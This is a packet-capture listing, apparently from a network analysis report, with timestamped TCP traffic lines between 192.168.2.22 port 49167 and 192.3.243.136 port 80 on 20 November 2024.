                                                                    Nov 20, 2024 07:56:45.620884895 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620893955 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620901108 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620912075 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620913982 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620924950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620925903 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620939016 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620944023 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620949984 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620953083 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620965004 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620970964 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620978117 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.620978117 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.620997906 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.621006966 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.621032953 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.621917963 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621929884 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621946096 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621954918 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621969938 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.621969938 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621980906 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.621980906 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621997118 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.621999025 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622006893 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622009993 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622021914 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622026920 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622031927 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622040033 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622047901 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622052908 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622057915 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622065067 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622075081 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622082949 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622102022 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622145891 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622724056 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622735023 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622746944 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.622761965 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.622778893 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.637351036 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.637365103 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.637423038 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.637434006 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.706768990 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.706804991 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.706824064 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.706861973 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.706882954 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.706929922 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707035065 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707119942 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707158089 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707333088 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707428932 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707470894 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707482100 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707520962 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707586050 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707597017 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707612038 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707627058 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707642078 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707648039 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707667112 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707684040 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707691908 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707740068 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707773924 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.707868099 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.707915068 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710491896 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710545063 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710599899 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710612059 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710628033 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710637093 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710644960 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710654020 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710655928 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710669041 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710669041 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710685015 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710688114 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710736036 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710752964 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710776091 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710798025 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710808992 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710824013 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710834980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710836887 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710846901 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710850000 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710859060 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710860968 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710887909 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710899115 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710908890 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710911989 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710923910 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710930109 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710943937 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710948944 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710957050 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.710968971 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710984945 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710994959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.710999966 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711011887 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711013079 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711024046 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711028099 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711036921 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711041927 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711050034 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711054087 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711067915 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711078882 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711093903 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711107969 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711110115 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711122036 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711123943 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711133003 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711136103 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711138964 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711153030 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711157084 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711167097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711169958 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711179018 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711184025 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711193085 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711194992 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711204052 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711208105 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711220980 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711224079 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711230040 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.711231947 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711246014 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711261034 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711287022 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.711961031 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712008953 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712008953 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712018967 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712048054 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712718010 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712760925 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712857962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712869883 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712886095 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712894917 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712903976 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712909937 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712915897 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712919950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712933064 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712935925 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712945938 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712958097 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712961912 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.712980986 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.712994099 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.768650055 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.768667936 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.768687010 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.768781900 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792635918 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792653084 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792670965 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792771101 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792793036 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792809963 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792826891 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792838097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792845964 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792853117 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792865992 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792869091 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792877913 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792885065 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792891026 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792905092 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792907000 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792917013 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792927980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792929888 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792946100 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.792954922 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.792977095 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793021917 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793104887 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793114901 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793128014 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793139935 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793142080 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793154955 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793163061 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793179035 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793196917 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793250084 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793261051 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793277025 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793324947 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793342113 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793385983 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793395996 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793411016 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793420076 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793421030 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793426037 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793431997 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793447018 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793448925 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793459892 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793467999 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793473005 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793489933 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793489933 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793509960 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793529034 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793590069 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793644905 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793656111 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793672085 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793680906 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793699980 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793833017 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793843985 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793853998 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793868065 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793883085 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793886900 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793893099 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793905973 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793908119 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793917894 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793925047 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793931007 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793941975 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793943882 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.793963909 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.793982029 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794054985 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794229031 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794246912 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794256926 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794270992 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794271946 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794291973 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794294119 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794305086 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794310093 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794317961 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794326067 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794328928 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794342041 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794343948 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794354916 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794363976 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794368029 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794379950 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794388056 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794393063 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794404984 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794408083 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794418097 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794425011 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794431925 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794440031 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794445038 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794456959 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794462919 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794470072 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794477940 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794481993 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794497967 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.794500113 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794516087 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794532061 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.794569016 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.797895908 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797908068 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797928095 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797938108 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797947884 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797959089 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.797962904 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797975063 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.797983885 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798008919 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798023939 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798033953 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798048019 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798059940 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798068047 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798073053 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798084021 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798085928 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798100948 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798101902 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798110962 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798119068 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798136950 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798211098 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798284054 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798294067 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798309088 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798321962 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798325062 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798341036 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798356056 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798506975 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798527002 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798537016 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798546076 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798552036 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798562050 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798568010 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798573971 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798585892 CET8049167192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:56:45.798587084 CET4916780192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:56:45.798600912 CET8049167192.3.243.136192.168.2.22
